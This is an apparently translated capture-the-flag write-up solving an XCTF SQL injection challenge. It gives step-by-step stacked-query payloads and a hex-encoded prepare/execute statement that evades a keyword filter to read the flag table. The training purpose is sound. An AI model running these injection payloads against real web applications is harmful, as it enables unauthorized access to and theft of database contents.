xctf:https://adworld.xctf.org.cn/
Enter single quotes and found an error
Back to normal:
/?inject=1' and 1=1--+
Error:
/?inject=1' and 1=2--+
order by 3 error, order by 2 is normal
?inject=1' order by 2--+
Use select to check the occurrence of regular matches, the following characters are not allowed
You can use stack injection to view the current database
?inject=1';show databases;--+
View the current table:
/?inject=1';show tables;--+
Check the fields of the words table and find that there is no flag:
/?inject=111';show columns from words;--+
Look 1919810931114514
at the fields in the table again , you will find that you can’t view it directly using show
the reason:
- Table names or fields that are the same as mysql keywords or reserved words must be distinguished by backticks
- If the table name is a pure number, then backticks must be used
So we added backquotes to view the purely numeric table and found the flag field:
/?inject=111';show columns from `1919810931114514`;--+
Query flag ideas:
We can not directly use select to view the flag, but we can use a method called dynamic query statement to view. Dynamic query also needs to use select statement, but we can convert sql statement to hexadecimal, mysql will automatically recognize the hexadecimal and convert it, store it in a sql statement variable, and then use execute to execute the sql statement.
If you don’t understand the dynamic query statement, you can learn the usage of dynamic query first:
MYSQL dynamic query result
mysql implements mssql exec dynamic query statement
We convert the sql statement into hexadecimal:
payload:
/?inject=1';SeT@sql=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @sql;execute execsql;#
- set@a: set a statement variable
- prepare: store a sql statement in execsql
- execute: execute a sql statement